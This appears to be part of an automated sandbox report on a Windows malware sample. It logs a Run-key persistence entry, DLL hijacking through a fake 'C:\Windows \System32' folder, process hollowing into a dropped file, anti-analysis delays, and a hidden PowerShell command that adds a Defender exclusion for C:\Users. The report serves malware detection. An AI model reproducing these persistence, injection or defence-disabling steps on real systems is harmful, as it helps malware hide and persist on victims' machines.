                  Source: netutils.dll.0.drStatic PE information: section name: /70
                  Source: netutils.dll.0.drStatic PE information: section name: /81
                  Source: netutils.dll.0.drStatic PE information: section name: /92
                  Source: easinvoker.exe.5.drStatic PE information: section name: .imrsiv
                  Source: netutils.dll.8.drStatic PE information: section name: .....
                  Source: netutils.dll.8.drStatic PE information: section name: .....
                  Source: netutils.dll.8.drStatic PE information: section name: ......
                  Source: netutils.dll.8.drStatic PE information: section name: ......
                  Source: netutils.dll.8.drStatic PE information: section name: ......
                  Source: netutils.dll.8.drStatic PE information: section name: ....
                  Source: netutils.dll.8.drStatic PE information: section name: ......
                  Source: netutils.dll.8.drStatic PE information: section name: ......
                  Source: netutils.dll.8.drStatic PE information: section name: ....
                  Source: netutils.dll.8.drStatic PE information: section name: ....
                  Source: netutils.dll.8.drStatic PE information: section name: ......
                  Source: netutils.dll.8.drStatic PE information: section name: /4
                  Source: netutils.dll.8.drStatic PE information: section name: /19
                  Source: netutils.dll.8.drStatic PE information: section name: /31
                  Source: netutils.dll.8.drStatic PE information: section name: /45
                  Source: netutils.dll.8.drStatic PE information: section name: /57
                  Source: netutils.dll.8.drStatic PE information: section name: /70
                  Source: netutils.dll.8.drStatic PE information: section name: /81
                  Source: netutils.dll.8.drStatic PE information: section name: /92
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .....
                  Source: Gjwyghlf.PIF.0.drStatic PE information: real checksum: 0x0 should be: 0x11bf5a
                  Source: netutils.dll.0.drStatic PE information: real checksum: 0x233d5 should be: 0x1f661
                  Source: tTIYCp2sf4.exeStatic PE information: real checksum: 0x0 should be: 0x11bf5a
                  Source: netutils.dll.8.drStatic PE information: real checksum: 0x233d5 should be: 0x1f661

                  Persistence and Installation Behavior

                  Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows \System32\easinvoker.exe
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeFile created: C:\Users\Public\Libraries\Gjwyghlf.PIF
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeFile created: C:\Users\Public\Libraries\flhgywjG.bat
                  Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Windows \System32\easinvoker.exe
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeFile created: C:\Users\Public\Libraries\easinvoker.exe
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeFile created: C:\Users\Public\Libraries\netutils.dll
                  Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Windows \System32\netutils.dll
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Gjwyghlf

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF Jump to behavior
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIF Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIF Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02867D08 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02867D08
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\flhgywjG.bat Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\flhgywjG.bat TID: 6828Thread sleep count: 312 > 30Jump to behavior
                  Source: C:\Users\Public\Libraries\flhgywjG.bat TID: 6828Thread sleep time: -156000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\Public\Libraries\flhgywjG.batLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9434Jump to behavior
                  Source: C:\Users\Public\Libraries\flhgywjG.batWindow / User API: foregroundWindowGot 377Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeAPI call chain: ExitProcess graph end nodegraph_0-22211
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: Gjwyghlf.PIF, 00000015.00000002.586140973.00000000007F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                  Source: tTIYCp2sf4.exe, 00000000.00000002.553677436.0000000000706000.00000004.00000020.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.553677436.000000000067A000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000003.555823587.0000000000718000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053964949.0000000000741000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000003.555823587.0000000000740000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053931437.0000000000718000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000003.555974241.0000000000740000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000013.00000002.571116857.0000000000738000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000013.00000002.571116857.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000015.00000002.586140973.0000000000854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: tTIYCp2sf4.exe, 00000000.00000002.553677436.00000000006EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe.com
                  Source: Gjwyghlf.PIF, 00000013.00000002.571116857.0000000000738000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_028558CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028558CC
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02867B24 LoadLibraryA,GetProcAddress,WriteProcessMemory,FreeLibrary,0_2_02867B24
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows \System32\easinvoker.exeCode function: 11_2_613C1B60 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_613C1B60

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory allocated: C:\Users\Public\Libraries\flhgywjG.bat base: 400000 protect: page read and writeJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory allocated: C:\Users\Public\Libraries\flhgywjG.bat base: 490000 protect: page read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFMemory allocated: C:\Users\Public\Libraries\flhgywjG.bat base: 400000 protect: page read and write
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFMemory allocated: C:\Users\Public\Libraries\flhgywjG.bat base: 490000 protect: page read and write
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\System32\netutils.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeSection unmapped: C:\Users\Public\Libraries\flhgywjG.bat base address: 400000Jump to behavior
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFSection unmapped: C:\Users\Public\Libraries\flhgywjG.bat base address: 400000
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 31C008Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D69760Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D698F0Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D6AEF0Jump to behavior
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 400000
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 39A008
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D69760
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D698F0
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D6AEF0
